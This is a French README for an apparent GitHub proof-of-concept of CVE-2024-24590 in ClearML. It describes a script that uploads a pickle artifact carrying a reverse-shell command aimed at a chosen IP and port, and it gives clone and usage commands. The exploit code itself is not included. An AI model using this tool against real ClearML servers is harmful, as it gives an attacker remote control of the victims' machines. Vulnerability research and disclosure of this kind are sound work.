
Preuve de concept pour CVE-2024-24590
_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
Ce projet démontre comment téléverser dynamiquement un artefact pickle vers ClearML avec des paramètres configurables via des arguments de ligne de commande. Le script initialise une tâche ClearML, configure dynamiquement une commande pour l'exécution d'un shell inverse, et la téléverse comme artefact. (PoC-CVE-2024-24590)
Référence : https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
clearmlargparsepickleosInstallez le paquet ClearML :
pip install clearml
Clonez le dépôt :
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git
cd PoC-CVE-2024-24590
Pour exécuter le script, utilisez la commande suivante avec les arguments appropriés :
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
Merci à Skriix :)